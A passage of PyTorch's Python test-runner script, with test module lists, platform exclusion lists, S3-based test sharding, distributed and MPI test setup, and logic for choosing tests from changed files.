from tools.stats_utils.s3_stat_parser import (get_previous_reports_for_branch, Report, HAVE_BOTO3)
except ImportError:
print("Unable to import s3_stat_parser from tools. Running without S3 stats...")
HAVE_BOTO3 = False
TESTS = [
'test_import_time',
'test_public_bindings',
'test_type_hints',
'test_autograd',
'benchmark_utils/test_benchmark_utils',
'test_binary_ufuncs',
'test_bundled_inputs',
'test_complex',
'test_cpp_api_parity',
'test_cpp_extensions_aot_no_ninja',
'test_cpp_extensions_aot_ninja',
'test_cpp_extensions_jit',
'distributed/test_c10d_common',
'distributed/test_c10d_gloo',
'distributed/test_c10d_nccl',
'distributed/test_jit_c10d',
'distributed/test_c10d_spawn_gloo',
'distributed/test_c10d_spawn_nccl',
'test_cuda',
'test_jit_cuda_fuser',
'test_cuda_primary_ctx',
'test_dataloader',
'test_datapipe',
'distributed/test_data_parallel',
'distributed/test_distributed_fork',
'distributed/test_distributed_spawn',
'distributions/test_constraints',
'distributions/test_distributions',
'test_dispatch',
'test_expecttest',
'test_foreach',
'test_indexing',
'test_jit',
'test_linalg',
'test_logging',
'test_mkldnn',
'test_model_dump',
'test_module_init',
'test_multiprocessing',
'test_multiprocessing_spawn',
'distributed/test_nccl',
'test_native_functions',
'test_numba_integration',
'test_nn',
'test_ops',
'test_optim',
'test_pytree',
'test_mobile_optimizer',
'test_set_default_mobile_cpu_allocator',
'test_xnnpack_integration',
'test_vulkan',
'test_sparse',
'test_sparse_csr',
'test_quantization',
'test_pruning_op',
'test_spectral_ops',
'test_serialization',
'test_shape_ops',
'test_show_pickle',
'test_sort_and_select',
'test_tensor_creation_ops',
'test_testing',
'test_torch',
'test_type_info',
'test_unary_ufuncs',
'test_utils',
'test_view_ops',
'test_vmap',
'test_namedtuple_return_api',
'test_numpy_interop',
'test_jit_profiling',
'test_jit_legacy',
'test_jit_fuser_legacy',
'test_tensorboard',
'test_namedtensor',
'test_reductions',
'test_type_promotion',
'test_jit_disabled',
'test_function_schema',
'test_op_aliases',
'test_overrides',
'test_jit_fuser_te',
'test_tensorexpr',
'test_tensorexpr_pybind',
'test_openmp',
'test_profiler',
"distributed/test_launcher",
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'test_determination',
'test_futures',
'test_fx',
'test_fx_experimental',
'test_functional_autograd_benchmark',
'test_package',
'test_license',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributed/optim/test_zero_redundancy_optimizer',
'distributed/elastic/timer/api_test',
'distributed/elastic/timer/local_timer_example',
'distributed/elastic/timer/local_timer_test',
'distributed/elastic/events/lib_test',
'distributed/elastic/metrics/api_test',
'distributed/elastic/utils/logging_test',
'distributed/elastic/utils/util_test',
'distributed/elastic/utils/distributed_test',
'distributed/elastic/multiprocessing/api_test',
]
# Tests need to be run with pytest.
USE_PYTEST_LIST = [
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributions/test_constraints',
'distributions/test_transforms',
'distributions/test_utils',
'test_typing',
"distributed/elastic/events/lib_test",
"distributed/elastic/agent/server/test/api_test",
]
WINDOWS_BLOCKLIST = [
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'distributed/test_distributed_fork',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributed/optim/test_zero_redundancy_optimizer',
"distributed/elastic/agent/server/test/api_test",
'distributed/elastic/multiprocessing/api_test',
]
ROCM_BLOCKLIST = [
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'test_determination',
'test_multiprocessing',
'test_jit_legacy',
'test_type_hints',
'test_openmp',
]
RUN_PARALLEL_BLOCKLIST = [
'test_cpp_extensions_jit',
'test_expecttest',
'test_jit_disabled',
'test_mobile_optimizer',
'test_multiprocessing',
'test_multiprocessing_spawn',
'test_namedtuple_return_api',
'test_overrides',
'test_show_pickle',
'test_tensorexpr',
'test_cuda_primary_ctx',
] + [test for test in TESTS if test.startswith('distributed/')]
WINDOWS_COVERAGE_BLOCKLIST = [
]
# These tests are slow enough that it's worth calculating whether the patch
# touched any related files first. This list was manually generated, but for every
# run with --determine-from, we use another generated list based on this one and the
# previous test stats.
TARGET_DET_LIST = [
'distributions/test_distributions',
'test_nn',
'test_autograd',
'test_cpp_extensions_jit',
'test_jit_legacy',
'test_dataloader',
'test_overrides',
'test_linalg',
'test_jit',
'test_jit_profiling',
'test_torch',
'test_binary_ufuncs',
'test_numpy_interop',
'test_reductions',
'test_shape_ops',
'test_sort_and_select',
'test_testing',
'test_view_ops',
'distributed/nn/jit/test_instantiator',
'distributed/test_distributed_fork',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'distributed/algorithms/ddp_comm_hooks/test_ddp_hooks',
'distributed/test_distributed_spawn',
'test_cuda',
'test_cuda_primary_ctx',
'test_cpp_extensions_aot_ninja',
'test_cpp_extensions_aot_no_ninja',
'test_serialization',
'test_optim',
'test_utils',
'test_multiprocessing',
'test_tensorboard',
'distributed/test_c10d_common',
'distributed/test_c10d_gloo',
'distributed/test_c10d_nccl',
'distributed/test_jit_c10d',
'distributed/test_c10d_spawn_gloo',
'distributed/test_c10d_spawn_nccl',
'test_quantization',
'test_pruning_op',
'test_determination',
'test_futures',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
]
# the JSON file to store the S3 test stats
TEST_TIMES_FILE = '.pytorch-test-times'
# if a test file takes longer than 5 min, we add it to TARGET_DET_LIST
SLOW_TEST_THRESHOLD = 300
_DEP_MODULES_CACHE: Dict[str, set] = {}
DISTRIBUTED_TESTS_CONFIG = {}
if dist.is_available():
DISTRIBUTED_TESTS_CONFIG['test'] = {
'WORLD_SIZE': '1'
}
if not TEST_WITH_ROCM and dist.is_mpi_available():
DISTRIBUTED_TESTS_CONFIG['mpi'] = {
'WORLD_SIZE': '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-mpi'
}
if dist.is_nccl_available():
DISTRIBUTED_TESTS_CONFIG['nccl'] = {
'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-nccl'
}
if dist.is_gloo_available():
DISTRIBUTED_TESTS_CONFIG['gloo'] = {
'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-gloo'
}
# https://stackoverflow.com/questions/2549939/get-signal-names-from-numbers-in-python
SIGNALS_TO_NAMES_DICT = {getattr(signal, n): n for n in dir(signal)
if n.startswith('SIG') and '_' not in n}
CPP_EXTENSIONS_ERROR = """
Ninja (https://ninja-build.org) is required for some of the C++ extensions
tests, but it could not be found. Install ninja with `pip install ninja`
or `conda install ninja`. Alternatively, disable said tests with
`run_test.py --exclude test_cpp_extensions_aot_ninja test_cpp_extensions_jit`.
"""
PYTORCH_COLLECT_COVERAGE = bool(os.environ.get("PYTORCH_COLLECT_COVERAGE"))
JIT_EXECUTOR_TESTS = [
'test_jit_cuda_fuser',
'test_jit_profiling',
'test_jit_legacy',
'test_jit_fuser_legacy',
]
def print_to_stderr(message):
print(message, file=sys.stderr)
# Convert something like pytorch_windows_vs2019_py36_cuda10.1_build to pytorch_windows_vs2019_py36_cuda10.1
def get_stripped_CI_job() -> str:
job = os.environ.get("CIRCLE_JOB", "").rstrip('0123456789')
if job.endswith('_slow_test'):
job = job[:len(job) - len('_slow_test')]
elif job.endswith('_test'):
job = job[:len(job) - len('_test')]
elif job.endswith('_build'):
job = job[:len(job) - len('_build')]
return job
def calculate_job_times(reports: List["Report"]) -> Dict[str, float]:
# an entry will be like ("test_file_name" -> (current_avg, # values))
jobs_to_times: Dict[str, Tuple[float, int]] = dict()
for report in reports:
assert report.get('format_version') == 2, "S3 format currently handled is version 2 only"
files: Dict[str, Any] = report['files']
for name, test_file in files.items():
if name not in jobs_to_times:
jobs_to_times[name] = (test_file['total_seconds'], 1)
else:
curr_avg, curr_count = jobs_to_times[name]
new_count = curr_count + 1
new_avg = (curr_avg * curr_count + test_file['total_seconds']) / new_count
jobs_to_times[name] = (new_avg, new_count)
# if there's 'test_cpp_extensions_aot' entry in jobs_to_times, add 'test_cpp_extensions_aot_ninja'
# and 'test_cpp_extensions_aot_no_ninja' duplicate entries to ease future computation since
# test_cpp_extensions_aot_no_ninja and test_cpp_extensions_aot_ninja are Python test jobs that
# both use the test_cpp_extensions_aot.py file.
if 'test_cpp_extensions_aot' in jobs_to_times:
jobs_to_times['test_cpp_extensions_aot_ninja'] = jobs_to_times['test_cpp_extensions_aot']
jobs_to_times['test_cpp_extensions_aot_no_ninja'] = jobs_to_times['test_cpp_extensions_aot']
return {job: time for job, (time, _) in jobs_to_times.items()}
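# Worked example for the running average above: folding total_seconds of 10.0
# and then 20.0 for the same file yields ((10.0 * 1) + 20.0) / 2 == 15.0.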
def pull_job_times_from_S3() -> Dict[str, float]:
if HAVE_BOTO3:
ci_job_prefix = get_stripped_CI_job()
s3_reports: List["Report"] = get_previous_reports_for_branch('origin/nightly', ci_job_prefix)
else:
print('Uh oh, boto3 is not found. Either it is not installed or we failed to import s3_stat_parser.')
print('If not installed, please install boto3 for automatic sharding and test categorization.')
s3_reports = []
if len(s3_reports) == 0:
        print('Gathered no reports from S3. Proceeding without them.')
return dict()
return calculate_job_times(s3_reports)
def get_past_job_times() -> Dict[str, float]:
if os.path.exists(TEST_TIMES_FILE):
with open(TEST_TIMES_FILE) as file:
test_times_json: JobTimeJSON = json.load(file)
curr_commit = subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip()
file_commit = test_times_json.get('commit', '')
curr_ci_job = get_stripped_CI_job()
file_ci_job = test_times_json.get('CIRCLE_JOB', 'N/A')
if curr_commit != file_commit:
print(f'Current test times file is from different commit {file_commit}.')
elif curr_ci_job != file_ci_job:
print(f'Current test times file is for different CI job {file_ci_job}.')
else:
print(f'Found stats for current commit: {curr_commit} and job: {curr_ci_job}. Proceeding with those values.')
return test_times_json.get('job_times', {})
# Found file, but commit or CI job in JSON doesn't match
print(f'Overwriting current file with stats based on current commit: {curr_commit} and CI job: {curr_ci_job}')
job_times = pull_job_times_from_S3()
print(f'Exporting S3 test stats to {TEST_TIMES_FILE}.')
export_S3_test_times(TEST_TIMES_FILE, job_times)
return job_times
class JobTimeJSON(TypedDict):
commit: str
job_times: Dict[str, float]
def get_job_times_json(job_times: Dict[str, float]) -> JobTimeJSON:
return {
'commit': subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip(),
'CIRCLE_JOB': get_stripped_CI_job(),
'job_times': job_times,
}
def get_shard(which_shard: int, num_shards: int, tests: List[str]) -> List[str]:
jobs_to_times = get_past_job_times()
# Got no stats from S3, returning early to save runtime
if len(jobs_to_times) == 0:
print('Gathered no stats from S3. Proceeding with default sharding plan.')
return tests[which_shard - 1 :: num_shards]
shards = calculate_shards(num_shards, tests, jobs_to_times)
_, tests_from_shard = shards[which_shard - 1]
return tests_from_shard
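# Sharding sketch: with no S3 stats, shard k of n takes every n-th test
# starting at index k - 1, e.g. shard 2 of 3 over [a, b, c, d, e] is
# tests[1::3] == [b, e].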
def get_slow_tests_based_on_S3() -> List[str]:
jobs_to_times: Dict[str, float] = get_past_job_times()
# Got no stats from S3, returning early to save runtime
if len(jobs_to_times) == 0:
print('Gathered no stats from S3. No new slow tests calculated.')
return []
slow_tests: List[str] = []
for test in TESTS:
if test in jobs_to_times and test not in TARGET_DET_LIST:
if jobs_to_times[test] > SLOW_TEST_THRESHOLD:
slow_tests.append(test)
return slow_tests
def get_executable_command(options, allow_pytest, disable_coverage=False):
if options.coverage and not disable_coverage:
executable = ['coverage', 'run', '--parallel-mode', '--source=torch']
else:
executable = [sys.executable]
if options.pytest:
if allow_pytest:
executable += ['-m', 'pytest']
else:
print_to_stderr('Pytest cannot be used for this test. Falling back to unittest.')
return executable
def run_test(test_module, test_directory, options, launcher_cmd=None, extra_unittest_args=None):
unittest_args = options.additional_unittest_args.copy()
if options.verbose:
unittest_args.append(f'-{"v"*options.verbose}') # in case of pytest
if test_module in RUN_PARALLEL_BLOCKLIST:
unittest_args = [arg for arg in unittest_args if not arg.startswith('--run-parallel')]
if extra_unittest_args:
assert isinstance(extra_unittest_args, list)
unittest_args.extend(extra_unittest_args)
# If using pytest, replace -f with equivalent -x
if options.pytest:
unittest_args = [arg if arg != '-f' else '-x' for arg in unittest_args]
# Can't call `python -m unittest test_*` here because it doesn't run code
# in `if __name__ == '__main__': `. So call `python test_*.py` instead.
argv = [test_module + '.py'] + unittest_args
# Multiprocessing related tests cannot run with coverage.
# Tracking issue: https://github.com/pytorch/pytorch/issues/50661
disable_coverage = sys.platform == 'win32' and test_module in WINDOWS_COVERAGE_BLOCKLIST
# Extra arguments are not supported with pytest
executable = get_executable_command(options, allow_pytest=not extra_unittest_args,
disable_coverage=disable_coverage)
command = (launcher_cmd or []) + executable + argv
print_to_stderr('Executing {} ... [{}]'.format(command, datetime.now()))
return shell(command, test_directory)
def test_cuda_primary_ctx(test_module, test_directory, options):
return run_test(test_module, test_directory, options, extra_unittest_args=['--subprocess'])
def _test_cpp_extensions_aot(test_module, test_directory, options, use_ninja):
if use_ninja:
try:
cpp_extension.verify_ninja_availability()
except RuntimeError:
print(CPP_EXTENSIONS_ERROR)
return 1
# Wipe the build folder, if it exists already
cpp_extensions_test_dir = os.path.join(test_directory, 'cpp_extensions')
cpp_extensions_test_build_dir = os.path.join(cpp_extensions_test_dir, 'build')
if os.path.exists(cpp_extensions_test_build_dir):
shutil.rmtree(cpp_extensions_test_build_dir)
# Build the test cpp extensions modules
shell_env = os.environ.copy()
shell_env['USE_NINJA'] = str(1 if use_ninja else 0)
cmd = [sys.executable, 'setup.py', 'install', '--root', './install']
return_code = shell(cmd, cwd=cpp_extensions_test_dir, env=shell_env)
if return_code != 0:
return return_code
if sys.platform != 'win32':
return_code = shell(cmd,
cwd=os.path.join(cpp_extensions_test_dir, 'no_python_abi_suffix_test'),
env=shell_env)
if return_code != 0:
return return_code
# "install" the test modules and run tests
python_path = os.environ.get('PYTHONPATH', '')
try:
cpp_extensions = os.path.join(test_directory, 'cpp_extensions')
install_directory = ''
# install directory is the one that is named site-packages
for root, directories, _ in os.walk(os.path.join(cpp_extensions, 'install')):
for directory in directories:
if '-packages' in directory:
install_directory = os.path.join(root, directory)
assert install_directory, 'install_directory must not be empty'
os.environ['PYTHONPATH'] = os.pathsep.join([install_directory, python_path])
return run_test(test_module, test_directory, options)
finally:
os.environ['PYTHONPATH'] = python_path
def test_cpp_extensions_aot_ninja(test_module, test_directory, options):
return _test_cpp_extensions_aot('test_cpp_extensions_aot', test_directory,
options, use_ninja=True)
def test_cpp_extensions_aot_no_ninja(test_module, test_directory, options):
return _test_cpp_extensions_aot('test_cpp_extensions_aot',
test_directory, options, use_ninja=False)
def test_distributed(test_module, test_directory, options):
# MPI tests are broken with Python-3.9
mpi_available = subprocess.call('command -v mpiexec', shell=True) == 0 and sys.version_info < (3, 9)
if options.verbose and not mpi_available:
print_to_stderr(
'MPI not available -- MPI backend tests will be skipped')
config = DISTRIBUTED_TESTS_CONFIG
for backend, env_vars in config.items():
if sys.platform == 'win32' and backend != 'gloo':
continue
if backend == 'mpi' and not mpi_available:
continue
for with_init_file in (True, False):
if sys.platform == 'win32' and not with_init_file:
continue
tmp_dir = tempfile.mkdtemp()
if options.verbose:
init_str = "with {} init_method"
with_init = init_str.format("file" if with_init_file else "env")
print_to_stderr(
'Running distributed tests for the {} backend {}'.format(
backend, with_init))
os.environ['TEMP_DIR'] = tmp_dir
os.environ['BACKEND'] = backend
os.environ['INIT_METHOD'] = 'env://'
os.environ.update(env_vars)
if with_init_file:
if test_module in ["test_distributed_fork", "test_distributed_spawn"]:
init_method = f'{FILE_SCHEMA}{tmp_dir}/'
else:
init_method = f'{FILE_SCHEMA}{tmp_dir}/shared_init_file'
os.environ['INIT_METHOD'] = init_method
try:
os.mkdir(os.path.join(tmp_dir, 'barrier'))
os.mkdir(os.path.join(tmp_dir, 'test_dir'))
if backend == 'mpi':
# test mpiexec for --noprefix option
with open(os.devnull, 'w') as devnull:
allowrunasroot_opt = '--allow-run-as-root' if subprocess.call(
'mpiexec --allow-run-as-root -n 1 bash -c ""', shell=True,
stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
noprefix_opt = '--noprefix' if subprocess.call(
f'mpiexec {allowrunasroot_opt} -n 1 --noprefix bash -c ""', shell=True,
stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
mpiexec = ['mpiexec', '-n', '3', noprefix_opt, allowrunasroot_opt]
return_code = run_test(test_module, test_directory, options,
launcher_cmd=mpiexec)
else:
return_code = run_test(test_module, test_directory, options)
if return_code != 0:
return return_code
finally:
shutil.rmtree(tmp_dir)
return 0
CUSTOM_HANDLERS = {
'test_cuda_primary_ctx': test_cuda_primary_ctx,
'test_cpp_extensions_aot_no_ninja': test_cpp_extensions_aot_no_ninja,
'test_cpp_extensions_aot_ninja': test_cpp_extensions_aot_ninja,
'distributed/test_distributed_fork': test_distributed,
'distributed/test_distributed_spawn': test_distributed,
}
def parse_test_module(test):
return test.split('.')[0]
class TestChoices(list):
def __init__(self, *args, **kwargs):
super(TestChoices, self).__init__(args[0])
def __contains__(self, item):
return list.__contains__(self, parse_test_module(item))
def parse_args():
parser = argparse.ArgumentParser(
description='Run the PyTorch unit test suite',
epilog='where TESTS is any of: {}'.format(', '.join(TESTS)))
parser.add_argument(
'-v',
'--verbose',
action='count',
default=0,
help='print verbose information and test-by-test results')
parser.add_argument(
'--jit',
action='store_true',
help='run all jit tests')
parser.add_argument(
'-pt', '--pytest', action='store_true',
help='If true, use `pytest` to execute the tests. E.g., this runs '
'TestTorch with pytest in verbose and coverage mode: '
'python run_test.py -vci torch -pt')
parser.add_argument(
'-c', '--coverage', action='store_true', help='enable coverage',
default=PYTORCH_COLLECT_COVERAGE)
parser.add_argument(
'-i',
'--include',
nargs='+',
choices=TestChoices(TESTS),
default=TESTS,
metavar='TESTS',
help='select a set of tests to include (defaults to ALL tests).'
' Tests can be specified with module name, module.TestClass,'
' or module.TestClass.test_method')
parser.add_argument(
'-x',
'--exclude',
nargs='+',
choices=TESTS,
metavar='TESTS',
default=[],
help='select a set of tests to exclude')
parser.add_argument(
'-f',
'--first',
choices=TESTS,
metavar='TESTS',
help='select the test to start from (excludes previous tests)')
parser.add_argument(
'-l',
'--last',
choices=TESTS,
metavar='TESTS',
help='select the last test to run (excludes following tests)')
parser.add_argument(
'--bring-to-front',
nargs='+',
choices=TestChoices(TESTS),
default=[],
metavar='TESTS',
help='select a set of tests to run first. This can be used in situations'
' where you want to run all tests, but care more about some set, '
'e.g. after making a change to a specific component')
parser.add_argument(
'--ignore-win-blocklist',
action='store_true',
help='always run blocklisted windows tests')
parser.add_argument(
'--determine-from',
help='File of affected source filenames to determine which tests to run.')
parser.add_argument(
'--continue-through-error',
action='store_true',
help='Runs the full test suite despite one of the tests failing')
parser.add_argument(
'additional_unittest_args',
nargs='*',
help='additional arguments passed through to unittest, e.g., '
'python run_test.py -i sparse -- TestSparse.test_factory_size_check')
parser.add_argument(
'--export-past-test-times',
nargs='?',
type=str,
const=TEST_TIMES_FILE,
help='dumps test times from previous S3 stats into a file in JSON format',
)
parser.add_argument(
'--shard',
nargs=2,
type=int,
help='runs a shard of the tests (taking into account other selections), e.g., '
'--shard 2 3 will break up the selected tests into 3 shards and run the tests '
'in the 2nd shard (the first number should not exceed the second)',
)
parser.add_argument(
'--exclude-jit-executor',
action='store_true',
help='exclude tests that are run for a specific jit config'
)
return parser.parse_args()
def find_test_index(test, selected_tests, find_last_index=False):
"""Find the index of the first or last occurrence of a given test/test module in the list of selected tests.
This function is used to determine the indices when slicing the list of selected tests when
``options.first``(:attr:`find_last_index`=False) and/or ``options.last``(:attr:`find_last_index`=True) are used.
:attr:`selected_tests` can be a list that contains multiple consecutive occurrences of tests
as part of the same test module, e.g.:
```
selected_tests = ['autograd', 'cuda', **'torch.TestTorch.test_acos',
'torch.TestTorch.test_tan', 'torch.TestTorch.test_add'**, 'utils']
```
If :attr:`test`='torch' and :attr:`find_last_index`=False, result should be **2**.
If :attr:`test`='torch' and :attr:`find_last_index`=True, result should be **4**.
Args:
test (str): Name of test to lookup
selected_tests (list): List of tests
find_last_index (bool, optional): whether to look up the index of the first
or last occurrence (first by default)
Returns:
index of the first or last occurrence of the given test
"""
idx = 0
found_idx = -1
for t in selected_tests:
if t.startswith(test):
found_idx = idx
if not find_last_index:
break
idx += 1
return found_idx
def exclude_tests(exclude_list, selected_tests, exclude_message=None):
for exclude_test in exclude_list:
tests_copy = selected_tests[:]
for test in tests_copy:
if test.startswith(exclude_test):
if exclude_message is not None:
print_to_stderr('Excluding {} {}'.format(test, exclude_message))
selected_tests.remove(test)
return selected_tests
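# Note that exclusion matches by prefix: excluding 'distributed' removes every
# selected test whose name starts with 'distributed'.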
def get_selected_tests(options):
selected_tests = options.include
if options.bring_to_front:
to_front = set(options.bring_to_front)
selected_tests = options.bring_to_front + list(filter(lambda name: name not in to_front,
selected_tests))
if options.first:
first_index = find_test_index(options.first, selected_tests)
selected_tests = selected_tests[first_index:]
if options.last:
last_index = find_test_index(options.last, selected_tests, find_last_index=True)
selected_tests = selected_tests[:last_index + 1]
if options.shard:
assert len(options.shard) == 2, "Unexpected shard format"
assert min(options.shard) > 0, "Shards must be positive numbers"
which_shard, num_shards = options.shard
assert which_shard <= num_shards, "Selected shard must be less than or equal to the total number of shards"
assert num_shards <= len(selected_tests), f"Number of shards must be less than or equal to {len(selected_tests)}"
selected_tests = get_shard(which_shard, num_shards, selected_tests)
if options.exclude_jit_executor:
options.exclude.extend(JIT_EXECUTOR_TESTS)
selected_tests = exclude_tests(options.exclude, selected_tests)
if sys.platform == 'win32' and not options.ignore_win_blocklist:
target_arch = os.environ.get('VSCMD_ARG_TGT_ARCH')
if target_arch != 'x64':
WINDOWS_BLOCKLIST.append('cpp_extensions_aot_no_ninja')
WINDOWS_BLOCKLIST.append('cpp_extensions_aot_ninja')
WINDOWS_BLOCKLIST.append('cpp_extensions_jit')
WINDOWS_BLOCKLIST.append('jit')
WINDOWS_BLOCKLIST.append('jit_fuser')
selected_tests = exclude_tests(WINDOWS_BLOCKLIST, selected_tests, 'on Windows')
elif TEST_WITH_ROCM:
selected_tests = exclude_tests(ROCM_BLOCKLIST, selected_tests, 'on ROCm')
return selected_tests
def test_impact_of_file(filename):
"""Determine what class of impact this file has on test runs.
Possible values:
TORCH - torch python code
CAFFE2 - caffe2 python code
TEST - torch test code
UNKNOWN - may affect all tests
NONE - known to have no effect on test outcome
CI - CI configuration files
"""
parts = filename.split(os.sep)
if parts[0] in ['.jenkins', '.circleci']:
return 'CI'
if parts[0] in ['docs', 'scripts', 'CODEOWNERS', 'README.md']:
return 'NONE'
elif parts[0] == 'torch':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TORCH'
elif parts[0] == 'caffe2':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'CAFFE2'
elif parts[0] == 'test':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TEST'
return 'UNKNOWN'
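# A few illustrative classifications (hypothetical paths, POSIX separators):
#   test_impact_of_file('torch/nn/functional.py')   -> 'TORCH'
#   test_impact_of_file('caffe2/python/helpers.py') -> 'CAFFE2'
#   test_impact_of_file('docs/source/index.rst')    -> 'NONE'
#   test_impact_of_file('.circleci/config.yml')     -> 'CI'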
def log_test_reason(file_type, filename, test, options):
if options.verbose:
print_to_stderr(
'Determination found {} file {} -- running {}'.format(
file_type,
filename,
test,
)
)
def get_dep_modules(test):
# Cache results in case of repetition
if test in _DEP_MODULES_CACHE:
return _DEP_MODULES_CACHE[test]
repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_location = os.path.join(repo_root, 'test', test + '.py')
finder = modulefinder.ModuleFinder(
# Ideally exclude all third party modules, to speed up calculation.
excludes=[
'scipy',
'numpy',
'numba',
'multiprocessing',
'sklearn',
'setuptools',
'hypothesis',
'llvmlite',
'joblib',
'email',
'importlib',
'unittest',
'urllib',
'json',
'collections',
# Modules below are excluded because they are hitting https://bugs.python.org/issue40350
# Trigger AttributeError: 'NoneType' object has no attribute 'is_package'
'mpl_toolkits',
'google',
'onnx',
# Triggers RecursionError
'mypy'
],
)
# HACK: some platforms default to ascii, so we can't just run_script :(
with open(test_location, 'r', encoding='utf-8') as fp:
finder.load_module('__main__', fp, test_location, ('', 'r', 1))
dep_modules = set(finder.modules.keys())
_DEP_MODULES_CACHE[test] = dep_modules
return dep_modules
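# For example, get_dep_modules('test_nn') parses test/test_nn.py with
# ModuleFinder and returns the names of all modules it transitively imports
# (minus the exclusions above).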
def determine_target(target_det_list, test, touched_files, options):
test = parse_test_module(test)
# Some tests are faster to execute than to determine.
if test not in target_det_list:
if options.verbose:
print_to_stderr(f'Running {test} without determination')
return True
# HACK: "no_ninja" is not a real module
if test.endswith('_no_ninja'):
test = test[:(-1 * len('_no_ninja'))]
if test.endswith('_ninja'):
test = test[:(-1 * len('_ninja'))]
dep_modules = get_dep_modules(test)
for touched_file in touched_files:
file_type = test_impact_of_file(touched_file)
if file_type == 'NONE':
continue
elif file_type == 'CI':
# Force all tests to run if any change is made to the CI
# configurations.
log_test_reason(file_type, touched_file, test, options)
return True
elif file_type == 'UNKNOWN':
# Assume uncategorized source files can affect every test.
log_test_reason(file_type, touched_file, test, options)
return True
elif file_type in ['TORCH', 'CAFFE2', 'TEST']:
